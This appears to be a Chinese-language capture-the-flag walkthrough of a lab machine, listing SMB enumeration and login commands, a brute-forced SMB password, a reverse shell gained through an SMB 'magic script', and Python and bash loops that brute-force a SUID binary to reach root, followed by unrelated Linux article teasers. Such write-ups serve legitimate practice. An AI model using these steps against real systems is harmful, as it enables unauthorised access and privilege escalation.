1. IP

  2. 端口

    在这里插入图片描述

  3. 访问 80 端口

    在这里插入图片描述

  4. 目录扫描

    在这里插入图片描述

  5. robots.txt & note.txt

    在这里插入图片描述
    在这里插入图片描述

  6. 访问 crossroads.png ,是一张图片

    在这里插入图片描述

  7. 访问 SMB

    smbclient -L 192.168.0.133

    在这里插入图片描述

    访问 smbshare 提示需要密码

  8. 对目标上的SMB信息进行枚举

    enum4linux 192.168.0.133 -A

    在这里插入图片描述

  9. 爆破 SMB 密码

    在这里插入图片描述

  10. 登录 SMB 服务

    smbclient //192.168.0.133/smbshare -U albert

    在这里插入图片描述

    magic script

    在这里插入图片描述

  11. 创建 smbscript.sh ,监听端口,上传到 smb 服务器,即可返回shell

    在这里插入图片描述

  12. 查看 SUID

    在这里插入图片描述

    执行文件需要输入密码,使用之前得到的密码

  13. 在 /home/albert 下存在 crossroads.png ,尝试读取其中的信息

    在这里插入图片描述

  14. 使用 python 脚本或者 sh 脚本

    import subprocess
import sys


with open("p.txt","r",encoding='ISO.8859.1') as fs:
    var= fs.read().splitlines()
for li in var:
    var1= li
    result= subprocess.getoutput("echo %s | ./beroot"%var1)
    print("testing password "+ var1)
    if "wrong password!!!" not in str(result):
        print(result)
        print("the password is: "+ var1)
        sys.exit(0)

    #!/bin/bash
for password in $(cat pass.txt)
do
	echo $password | ./beroot
done

    在这里插入图片描述

  15. 运行 beroot 会生成root的密码,可以直接切换成root用户

Logo
Linux

更多推荐

网卡速率和双工模式的配置

http://linux.chinaitlab.com/system/792187.html1、mii-tool 配置网络设备协商方式的工具;    1.1 mii-tool 介绍;    mii-tool - view, manipulate media-independent interface status (mii-tool 是查看,管理介质的网络接口的状态)

avatar Linux

Linux虚拟文件系统之文件系统卸载(sys_umount())

Linux中卸载文件系统由umount系统调用实现,入口函数为sys_umount()。较于文件系统的安装较为简单,下面是具体的实现。1. /*sys_umont系统调用*/2. SYSCALL_DEFINE2(umount, char __user *, name, int, flags)3. {4.struct path path;

avatar Linux

Linux系统下超级终端Minicom的使用方法(例如:连接交换机,路由器等)转http://baike.baidu.com/view/2911642.htm?fr=ala0_1

<br />  Linux系统下超级终端Minicom的使用方法 <br />  Linux下的Minicom的功能与下的超级终端功能相似,适于在通过超级终端对设备的管理以及对嵌入操作系统的升级,现写出Minicom的使用手册: <br />  1. 启动minicom <br />  以root权限登录系统 <br />  使用命令 <br />  minicom –s 则minicom启动,屏

avatar Linux